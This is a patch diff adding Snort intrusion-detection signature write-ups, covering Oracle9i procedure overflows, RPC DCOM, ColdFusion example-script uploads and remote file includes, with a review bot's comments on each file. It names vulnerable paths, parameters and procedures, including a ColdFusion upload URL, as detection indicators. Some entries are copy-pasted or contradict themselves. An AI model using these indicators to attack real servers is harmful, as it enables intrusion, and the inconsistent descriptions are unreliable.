+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_unique_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
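Review bot: the procedure name is split across lines in Detailed Information, `+vulnerability in the procedure comment_on_unique_resolution` / `+. This procedure is included in` / `+sys.dbms_repcat_conf.`; join these into one sentence. `Oracle Oracle9i` repeats the vendor name, and Additional References is empty although Corrective Action says to apply the vendor patch; cite the Oracle alert.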
--- /dev/null
+++ b/doc/signatures/3337.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3337
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
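Review bot: Attack Scenarios, `+An attacker may make a request for a file with an overly long filename` / `+via a network share.`, describes a file-share attack, while Detailed Information says the overflow is triggered by `A malformed request to an RPC port`; the scenario should describe a malformed DCOM request over RPC. Typo: `+Simple. Expoit code exists.`. Additional References is empty although Corrective Action says to apply vendor patches; cite the Microsoft bulletin for this RPC DCOM issue.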
--- /dev/null
+++ b/doc/signatures/1058.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1058
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
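Review bot: the Additional References entry, `+NGS Whitepaper - Advanced SQL Injection` / `+www.nextgenss.com/papers/advanced_sql_injection.pdf`, has no connection to the description, which never mentions SQL injection, and the URL lacks the `http://` scheme the other references in this patch use. Either add a sentence to Detailed Information explaining how sid 1058 relates to SQL injection or replace the reference with one for the vulnerability the rule detects; the description is otherwise generic and does not name the URI or application the rule matches.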
--- /dev/null
+++ b/doc/signatures/3318.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3318
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
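Review bot: the text is identical to 3337.txt, including the `+Simple. Expoit code exists.` typo and the network-share Attack Scenario that does not match the `malformed request to an RPC port` in Detailed Information. Since 3318 is a separate sid, Detailed Information should say what distinguishes it (which RPC interface, transport or port the rule matches) instead of repeating the generic paragraph; fix the typo and cite the vendor bulletin under Additional References.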
--- /dev/null
+++ b/doc/signatures/100000747.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000747
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "index.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
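Review bot: the third paragraph of Detailed Information (`+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. ...`) and the Attack Scenarios sentence about `access an authentication mechanism and supply his/her own credentials` are generic CGI boilerplate and do not describe a remote file include; replace them with the scenario the Summary already gives, a URL to a remote file supplied as the `_PX_config[manager_path]` parameter of index.php, which the script then includes. Typos: `ona` for `on a`, `attackers` for `attacker's`, and `an exploitation attempt has been attempted` is redundant. Formatting: the file opens with two blank lines, and the `--` after the Sid, Affected Systems and Contributors sections lacks the blank line used in the other files.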
--- /dev/null
+++ b/doc/signatures/3208.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3208
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
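Review bot: same text as 3337.txt and 3318.txt, with the `+Simple. Expoit code exists.` typo and a network-share Attack Scenario that contradicts the RPC-port description. Three sids sharing one paragraph leaves the reader unable to tell them apart; add a sentence to Detailed Information stating what sid 3208 specifically matches, fix the typo, and fill in Additional References with the vendor bulletin.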
--- /dev/null
+++ b/doc/signatures/1947.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1947
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
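Review bot: this description repeats 1058.txt without naming the URI, application or vulnerability sid 1947 detects; `Many known vulnerabilities exist for each implementation and the attack scenarios are legion.` tells the analyst nothing actionable when triaging the alert. Add one sentence to Detailed Information identifying what the rule matches and a reference under the empty Additional References section.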
--- /dev/null
+++ b/doc/signatures/905.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+905
+
+--
+Summary:
+This event is generated when an attempt is made to access an Example 
+application on a Coldfusion 4.x server. 
+
+This 'Web Publish Example Script' can be exploited to allow the attacker
+to upload arbitrary files to the server.
+
+--
+Impact:
+Serious: The vulnerability allows custom code to be uploaded to the 
+server.
+
+--
+Detailed Information:
+ColdFusion (Macromedia, formerly Allaire) web servers have several 
+default Example applications installed that have vulnerabilities.  The 
+'Web Publish Example script' application can be exploited to allow the 
+uploading of arbitrary files.
+
+See Macromedia Security Bulletin (MPSB01-08) for complete information.
+
+
+--
+Affected Systems:
+	ColdFusion versions 2.x, 3.x, 4.x for Windows
+	ColdFusion versions 4.x for Solaris, HP-UX
+	ColdFusion versions 4.5.x for Linux
+	Expression Evaluator Patch (ASB99-01)
+
+--
+Attack Scenarios:
+The web application allows file uploading via a URL like this:
+
+http://www.target.com/CFDOCS/exampleapps/publish/admin/application.cfm
+
+Once the file has been uploaded, it can be executed by crafting a 2nd 
+URL to the uploaded file.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If ColdFusion 4.x's example code is being used, This rule will generate 
+an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Delete all example code.  This is one of several significant 
+vulnerabilities that are exploitable if the example code is left on a 
+production server.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References:
+
+Macromedia Security Bulletin (MPSB01-08)
+http://www.macromedia.com/devnet/security/security_zone/mpsb01-08.html
+
+--
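Review bot: `+	Expression Evaluator Patch (ASB99-01)` is listed under Affected Systems, but it is a patch, not a product version; if servers that applied it are still vulnerable, say so in Detailed Information instead. The Summary says `Coldfusion 4.x` while Affected Systems lists 2.x and 3.x as well; make them agree. The 'Web Publish Example Script' is named in Summary and Detailed Information, but the Attack Scenarios URL ends in `.../publish/admin/application.cfm`; state that this is that script so the reader can connect the two. Minor: `+If ColdFusion 4.x's example code is being used, This rule will generate` (lower-case `this`), `2nd` should be `second`, and Detailed Information ends with two blank lines.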
--- /dev/null
+++ b/doc/signatures/2791.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2791
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
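Review bot: the procedure name is split across lines in Detailed Information, `+vulnerability in the procedure purge_flavor_definition` / `+. This procedure is included in` / `+dbms_repcat.`; join these into one sentence. The package is given as `dbms_repcat.` without the `sys.` owner prefix used in the other Oracle descriptions in this patch (2831, 2696, 2883); use the same form. Additional References is empty although Corrective Action says to apply the vendor patch.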
--- /dev/null
+++ b/doc/signatures/2703.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+2703
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+--
+Affected Systems:
+	Oracle iSQLPlus
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
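Review bot: Attack Scenarios refers to "the procedure in question", but unlike the other Oracle entries this file never names a procedure or package, and Affected Systems lists "Oracle iSQLPlus" while Detailed Information describes overflows in database packages and procedures; either add the paragraph naming the procedure or rewrite Detailed Information to describe the iSQL*Plus weakness the rule actually matches. Additional References is empty, and the section headers carry trailing whitespace.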
--- /dev/null
+++ b/doc/signatures/1822.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1822
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
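Review bot: Affected Systems is empty; Detailed Information already names web servers, web applications and ftp servers, so at minimum that list should be carried over. The Attack Scenarios sentence has a stray comma ("directory traversal technique, to browse") and narrows the scope to "the ftp root directory" although the rule is described as generic directory traversal; say which it is. Additional References is empty and has two blank lines before the closing "--".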
--- /dev/null
+++ b/doc/signatures/2983.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2983
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
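Review bot: Summary says the rule fires on access to the ADMIN$ share, but Detailed Information describes only the drive-letter shares ("%DRIVE_LETTER% + $") and Attack Scenarios talks about "files located on the C drive", which is C$ rather than ADMIN$; describe what ADMIN$ exposes so the three sections agree. "Anybody with administrative rights can remotely access the share" also contradicts the False Positives entry of "None Known": legitimate remote administration will trigger this rule and should be listed there.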
--- /dev/null
+++ b/doc/signatures/2571.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2571
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running a web application on Microsoft Internet 
+Information Server (IIS).
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running a web application on Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+The attacker may also be trying to gain administrator access to the 
+host, garner information on users of the system or retrieve sensitive 
+customer information.
+
+Some applications may store sensitive information such as database 
+connections, user information, passwords and customer information in 
+files accessible via a web interface. Care should be taken to ensure 
+these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
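Review bot: nothing in this file says what the rule matches (which file, path or request pattern on the IIS host), so an analyst reading the alert cannot tell what "potential weakness" was probed; Detailed Information should name the resource the rule looks for. The Impact line is missing punctuation ("Information gathering possible administrator access" should read "Information gathering, possible administrator access."), the Attack Scenarios paragraph is one unwrapped line while the rest of the file is wrapped, and Additional References is empty.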
--- /dev/null
+++ b/doc/signatures/2753.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2753
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_repsites
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
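Review bot: same layout defect as 2791.txt above: the full stop after `comment_on_repsites` has been pushed onto the next line ("comment_on_repsites" / ". This procedure is included in"); join it into "…in the procedure comment_on_repsites. This procedure is included in dbms_repcat." "Oracle Oracle9i" repeats the vendor name, the headers carry trailing whitespace, and Additional References is empty although Corrective Action refers to a vendor patch.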
--- /dev/null
+++ b/doc/signatures/1026.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1026
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
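Review bot: the body of this file is identical to 2571.txt above and gives no rule-specific detail, so the same comment applies: state which request the rule matches. Formatting also differs from the other entries: the Sid number sits on the "Sid:" line instead of the following line, two blank lines follow it, the paragraphs are unwrapped, and the Impact line is missing punctuation ("Information gathering, possible administrator access.").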
--- /dev/null
+++ b/doc/signatures/2824.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2824
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure set_local_flavor
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
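Review bot: the full stop after `set_local_flavor` has been pushed onto the next line ("set_local_flavor" / ". This procedure is included in"); join it into "…in the procedure set_local_flavor. This procedure is included in sys.dbms_repcat_fla." Note that this entry writes the package with the `sys.` schema prefix while the other dbms_repcat entries omit it; pick one form. "Oracle Oracle9i" repeats the vendor name, the headers carry trailing whitespace, and Additional References is empty.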
--- /dev/null
+++ b/doc/signatures/100000850.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000850
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "include.php" using a remote file being passed as the "lang_settings" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang_settings" parameter in the "include.php" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
